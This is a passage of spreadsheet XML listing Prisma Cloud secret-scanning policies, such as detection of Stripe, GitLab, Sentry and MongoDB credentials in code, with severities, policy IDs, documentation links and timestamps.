      </c>
      <c r="X558" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-4</t>
        </is>
      </c>
      <c r="Y558" t="inlineStr"/>
      <c r="Z558" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA558" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB558" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC558" t="inlineStr">
        <is>
          <t>CKV_SECRET_4</t>
        </is>
      </c>
      <c r="AD558" t="b">
        <v>1</v>
      </c>
      <c r="AE558" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF558" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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8" t="inlineStr">
        <is>
          <t>7cbba17c-f37e-4594-9d6f-5cb09225de0a</t>
        </is>
      </c>
      <c r="AI558" t="inlineStr"/>
      <c r="AJ558" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK558" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="559">
      <c r="A559" t="inlineStr"/>
      <c r="B559" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C559" s="2" t="inlineStr"/>
      <c r="D559" t="inlineStr"/>
      <c r="E559" t="inlineStr"/>
      <c r="F559" t="inlineStr"/>
      <c r="G559" t="b">
        <v>1</v>
      </c>
      <c r="H5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59" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J559" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K559" t="inlineStr">
        <is>
          <t>Replicate user access token detected in code</t>
        </is>
      </c>
      <c r="L559" t="inlineStr"/>
      <c r="M559" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N559" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O559" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P559" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q559" t="inlineStr"/>
      <c r="R559" t="inlineStr"/>
      <c r="S559" t="inlineStr"/>
      <c r="T559" t="b">
        <v>0</v>
      </c>
      <c r="U559" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V559" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W559" t="inlineStr">
        <is>
          <t>Replicate user access token</t>
        </is>
      </c>
      <c r="X559" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-244</t>
        </is>
      </c>
      <c r="Y559" t="inlineStr"/>
      <c r="Z559" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA559" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB559" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC559" t="inlineStr">
        <is>
          <t>CKV_SECRET_244</t>
        </is>
      </c>
      <c r="AD559" t="b">
        <v>1</v>
      </c>
      <c r="AE559" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF559" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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59" t="inlineStr">
        <is>
          <t>af2eadca-e5e7-456b-8ad4-52b509b8f13b</t>
        </is>
      </c>
      <c r="AI559" t="inlineStr"/>
      <c r="AJ559" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK559" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="560">
      <c r="A560" t="inlineStr"/>
      <c r="B560" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C560" s="2" t="inlineStr"/>
      <c r="D560" t="inlineStr"/>
      <c r="E560" t="inlineStr"/>
      <c r="F560" t="inlineStr"/>
      <c r="G560" t="b">
        <v>1</v>
      </c>
      <c r="H5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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J560" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K560" t="inlineStr">
        <is>
          <t>Frame IO Token detected in code</t>
        </is>
      </c>
      <c r="L560" t="inlineStr"/>
      <c r="M560" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N560" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O560" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P560" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q560" t="inlineStr"/>
      <c r="R560" t="inlineStr"/>
      <c r="S560" t="inlineStr"/>
      <c r="T560" t="b">
        <v>0</v>
      </c>
      <c r="U560" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V560" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W560" t="inlineStr">
        <is>
          <t>Frame IO Token</t>
        </is>
      </c>
      <c r="X560" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-105</t>
        </is>
      </c>
      <c r="Y560" t="inlineStr"/>
      <c r="Z560" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA560" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB560" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC560" t="inlineStr">
        <is>
          <t>CKV_SECRET_105</t>
        </is>
      </c>
      <c r="AD560" t="b">
        <v>1</v>
      </c>
      <c r="AE560" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF560" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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0" t="inlineStr">
        <is>
          <t>9c63b1a4-daf0-4c9e-8ef7-965eae4adc31</t>
        </is>
      </c>
      <c r="AI560" t="inlineStr"/>
      <c r="AJ560" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK560" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="561">
      <c r="A561" t="inlineStr"/>
      <c r="B561" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C561" s="2" t="inlineStr"/>
      <c r="D561" t="inlineStr"/>
      <c r="E561" t="inlineStr"/>
      <c r="F561" t="inlineStr"/>
      <c r="G561" t="b">
        <v>1</v>
      </c>
      <c r="H5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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J561" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K561" t="inlineStr">
        <is>
          <t>Stripe Access Key detected in code</t>
        </is>
      </c>
      <c r="L561" t="inlineStr"/>
      <c r="M561" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N561" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O561" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P561" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q561" t="inlineStr"/>
      <c r="R561" t="inlineStr"/>
      <c r="S561" t="inlineStr"/>
      <c r="T561" t="b">
        <v>0</v>
      </c>
      <c r="U561" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V561" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W561" t="inlineStr">
        <is>
          <t>Stripe Access Key</t>
        </is>
      </c>
      <c r="X561" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-17</t>
        </is>
      </c>
      <c r="Y561" t="inlineStr"/>
      <c r="Z561" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA561" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB561" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC561" t="inlineStr">
        <is>
          <t>CKV_SECRET_17</t>
        </is>
      </c>
      <c r="AD561" t="b">
        <v>1</v>
      </c>
      <c r="AE561" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF561" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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1" t="inlineStr">
        <is>
          <t>53b697f8-bac9-4c27-8d37-ca29e62f7af5</t>
        </is>
      </c>
      <c r="AI561" t="inlineStr"/>
      <c r="AJ561" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK561" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="562">
      <c r="A562" t="inlineStr"/>
      <c r="B562" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C562" s="2" t="inlineStr"/>
      <c r="D562" t="inlineStr"/>
      <c r="E562" t="inlineStr"/>
      <c r="F562" t="inlineStr"/>
      <c r="G562" t="b">
        <v>1</v>
      </c>
      <c r="H5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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J562" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K562" t="inlineStr">
        <is>
          <t>LaunchDarkly Personal Token detected in code</t>
        </is>
      </c>
      <c r="L562" t="inlineStr"/>
      <c r="M562" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N562" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O562" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P562" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q562" t="inlineStr"/>
      <c r="R562" t="inlineStr"/>
      <c r="S562" t="inlineStr"/>
      <c r="T562" t="b">
        <v>0</v>
      </c>
      <c r="U562" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V562" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W562" t="inlineStr">
        <is>
          <t>LaunchDarkly Personal Token</t>
        </is>
      </c>
      <c r="X562" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-52</t>
        </is>
      </c>
      <c r="Y562" t="inlineStr"/>
      <c r="Z562" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA562" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB562" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC562" t="inlineStr">
        <is>
          <t>CKV_SECRET_52</t>
        </is>
      </c>
      <c r="AD562" t="b">
        <v>1</v>
      </c>
      <c r="AE562" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF562" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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2" t="inlineStr">
        <is>
          <t>90828b95-50f6-42ed-bc3f-4cc8a80e0250</t>
        </is>
      </c>
      <c r="AI562" t="inlineStr"/>
      <c r="AJ562" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK562" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="563">
      <c r="A563" t="inlineStr"/>
      <c r="B563" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C563" s="2" t="inlineStr"/>
      <c r="D563" t="inlineStr"/>
      <c r="E563" t="inlineStr"/>
      <c r="F563" t="inlineStr"/>
      <c r="G563" t="b">
        <v>1</v>
      </c>
      <c r="H5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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J563" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K563" t="inlineStr">
        <is>
          <t>Docker Swarm Unlock Key detected in code</t>
        </is>
      </c>
      <c r="L563" t="inlineStr"/>
      <c r="M563" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N563" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O563" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P563" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q563" t="inlineStr"/>
      <c r="R563" t="inlineStr"/>
      <c r="S563" t="inlineStr"/>
      <c r="T563" t="b">
        <v>0</v>
      </c>
      <c r="U563" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V563" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W563" t="inlineStr">
        <is>
          <t>Docker Swarm Unlock Key</t>
        </is>
      </c>
      <c r="X563" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-171</t>
        </is>
      </c>
      <c r="Y563" t="inlineStr"/>
      <c r="Z563" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA563" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB563" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC563" t="inlineStr">
        <is>
          <t>CKV_SECRET_171</t>
        </is>
      </c>
      <c r="AD563" t="b">
        <v>1</v>
      </c>
      <c r="AE563" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF563" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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3" t="inlineStr">
        <is>
          <t>d5e0d330-7893-47c0-8d13-ae5150b6916f</t>
        </is>
      </c>
      <c r="AI563" t="inlineStr"/>
      <c r="AJ563" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK563" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="564">
      <c r="A564" t="inlineStr"/>
      <c r="B564" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C564" s="2" t="inlineStr"/>
      <c r="D564" t="inlineStr"/>
      <c r="E564" t="inlineStr"/>
      <c r="F564" t="inlineStr"/>
      <c r="G564" t="b">
        <v>1</v>
      </c>
      <c r="H5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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J564" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K564" t="inlineStr">
        <is>
          <t>MongoDB Connection String detected in code</t>
        </is>
      </c>
      <c r="L564" t="inlineStr"/>
      <c r="M564" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N564" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O564" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P564" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q564" t="inlineStr"/>
      <c r="R564" t="inlineStr"/>
      <c r="S564" t="inlineStr"/>
      <c r="T564" t="b">
        <v>0</v>
      </c>
      <c r="U564" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V564" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W564" t="inlineStr">
        <is>
          <t>MongoDB Connection String</t>
        </is>
      </c>
      <c r="X564" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-77</t>
        </is>
      </c>
      <c r="Y564" t="inlineStr"/>
      <c r="Z564" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA564" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB564" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC564" t="inlineStr">
        <is>
          <t>CKV_SECRET_77</t>
        </is>
      </c>
      <c r="AD564" t="b">
        <v>1</v>
      </c>
      <c r="AE564" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF564" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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4" t="inlineStr">
        <is>
          <t>697b3135-4d79-41b9-9f3a-6fca4d8843e8</t>
        </is>
      </c>
      <c r="AI564" t="inlineStr"/>
      <c r="AJ564" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK564" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="565">
      <c r="A565" t="inlineStr"/>
      <c r="B565" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C565" s="2" t="inlineStr"/>
      <c r="D565" t="inlineStr"/>
      <c r="E565" t="inlineStr"/>
      <c r="F565" t="inlineStr"/>
      <c r="G565" t="b">
        <v>1</v>
      </c>
      <c r="H5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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J565" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K565" t="inlineStr">
        <is>
          <t>Travis Personal Token detected in code</t>
        </is>
      </c>
      <c r="L565" t="inlineStr"/>
      <c r="M565" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N565" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O565" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P565" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q565" t="inlineStr"/>
      <c r="R565" t="inlineStr"/>
      <c r="S565" t="inlineStr"/>
      <c r="T565" t="b">
        <v>0</v>
      </c>
      <c r="U565" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V565" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W565" t="inlineStr">
        <is>
          <t>Travis Personal Token</t>
        </is>
      </c>
      <c r="X565" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-69</t>
        </is>
      </c>
      <c r="Y565" t="inlineStr"/>
      <c r="Z565" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA565" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB565" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC565" t="inlineStr">
        <is>
          <t>CKV_SECRET_69</t>
        </is>
      </c>
      <c r="AD565" t="b">
        <v>1</v>
      </c>
      <c r="AE565" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF565" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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5" t="inlineStr">
        <is>
          <t>9337a600-63d8-4b20-8492-6f6900ed2b6f</t>
        </is>
      </c>
      <c r="AI565" t="inlineStr"/>
      <c r="AJ565" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK565" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="566">
      <c r="A566" t="inlineStr"/>
      <c r="B566" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C566" s="2" t="inlineStr"/>
      <c r="D566" t="inlineStr"/>
      <c r="E566" t="inlineStr"/>
      <c r="F566" t="inlineStr"/>
      <c r="G566" t="b">
        <v>1</v>
      </c>
      <c r="H5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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J566" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K566" t="inlineStr">
        <is>
          <t>Sentry Token detected in code</t>
        </is>
      </c>
      <c r="L566" t="inlineStr"/>
      <c r="M566" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N566" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O566" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P566" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q566" t="inlineStr"/>
      <c r="R566" t="inlineStr"/>
      <c r="S566" t="inlineStr"/>
      <c r="T566" t="b">
        <v>0</v>
      </c>
      <c r="U566" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V566" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W566" t="inlineStr">
        <is>
          <t>Sentry Token</t>
        </is>
      </c>
      <c r="X566" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-65</t>
        </is>
      </c>
      <c r="Y566" t="inlineStr"/>
      <c r="Z566" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA566" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB566" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC566" t="inlineStr">
        <is>
          <t>CKV_SECRET_65</t>
        </is>
      </c>
      <c r="AD566" t="b">
        <v>1</v>
      </c>
      <c r="AE566" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF566" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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6" t="inlineStr">
        <is>
          <t>77cc76d6-34e9-4aea-8168-508e8c9b35bb</t>
        </is>
      </c>
      <c r="AI566" t="inlineStr"/>
      <c r="AJ566" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK566" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="567">
      <c r="A567" t="inlineStr"/>
      <c r="B567" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C567" s="2" t="inlineStr"/>
      <c r="D567" t="inlineStr"/>
      <c r="E567" t="inlineStr"/>
      <c r="F567" t="inlineStr"/>
      <c r="G567" t="b">
        <v>1</v>
      </c>
      <c r="H5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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J567" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K567" t="inlineStr">
        <is>
          <t>AWS MWS Auth Token detected in code</t>
        </is>
      </c>
      <c r="L567" t="inlineStr"/>
      <c r="M567" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N567" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O567" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P567" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q567" t="inlineStr"/>
      <c r="R567" t="inlineStr"/>
      <c r="S567" t="inlineStr"/>
      <c r="T567" t="b">
        <v>0</v>
      </c>
      <c r="U567" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V567" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W567" t="inlineStr">
        <is>
          <t>AWS MWS Auth Token</t>
        </is>
      </c>
      <c r="X567" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-82</t>
        </is>
      </c>
      <c r="Y567" t="inlineStr"/>
      <c r="Z567" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA567" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB567" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC567" t="inlineStr">
        <is>
          <t>CKV_SECRET_82</t>
        </is>
      </c>
      <c r="AD567" t="b">
        <v>1</v>
      </c>
      <c r="AE567" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF567" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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7" t="inlineStr">
        <is>
          <t>885e11fa-4061-4b00-a8ce-529470797738</t>
        </is>
      </c>
      <c r="AI567" t="inlineStr"/>
      <c r="AJ567" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK567" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="568">
      <c r="A568" t="inlineStr"/>
      <c r="B568" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C568" s="2" t="inlineStr"/>
      <c r="D568" t="inlineStr"/>
      <c r="E568" t="inlineStr"/>
      <c r="F568" t="inlineStr"/>
      <c r="G568" t="b">
        <v>1</v>
      </c>
      <c r="H5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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J568" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K568" t="inlineStr">
        <is>
          <t>GitLab Token detected in code</t>
        </is>
      </c>
      <c r="L568" t="inlineStr"/>
      <c r="M568" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N568" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O568" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P568" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q568" t="inlineStr"/>
      <c r="R568" t="inlineStr"/>
      <c r="S568" t="inlineStr"/>
      <c r="T568" t="b">
        <v>0</v>
      </c>
      <c r="U568" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V568" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="W568" t="inlineStr">
        <is>
          <t>GitLab Token</t>
        </is>
      </c>
      <c r="X568" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/secrets-policies/secrets-policy-index/git-secrets-44</t>
        </is>
      </c>
      <c r="Y568" t="inlineStr"/>
      <c r="Z568" t="inlineStr">
        <is>
          <t>{"category":"Secrets","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA568" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB568" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC568" t="inlineStr">
        <is>
          <t>CKV_SECRET_44</t>
        </is>
      </c>
      <c r="AD568" t="b">
        <v>1</v>
      </c>
      <c r="AE568" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF568" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG5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8" t="inlineStr">
        <is>
          <t>14db94b2-590d-484b-98c5-b96aec2cfe97</t>
        </is>
      </c>
      <c r="AI568" t="inlineStr"/>
      <c r="AJ568" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK568" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="569">
      <c r="A569" t="inlineStr"/>
      <c r="B569" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C569" s="2" t="inlineStr"/>
      <c r="D569" t="inlineStr"/>
      <c r="E569" t="inlineStr"/>
      <c r="F569" t="inlineStr"/>
      <c r="G569" t="b">
        <v>1</v>
      </c>
      <c r="H5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69" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J569" t="inlineStr">
        <is>
          <t>Code:Secrets</t>
        </is>
      </c>
      <c r="K569" t="inlineStr">
        <is>
          <t>RubyGems API Key detected in code</t>
        </is>
      </c>
      <c r="L569" t="inlineStr"/>
      <c r="M569" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N569" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
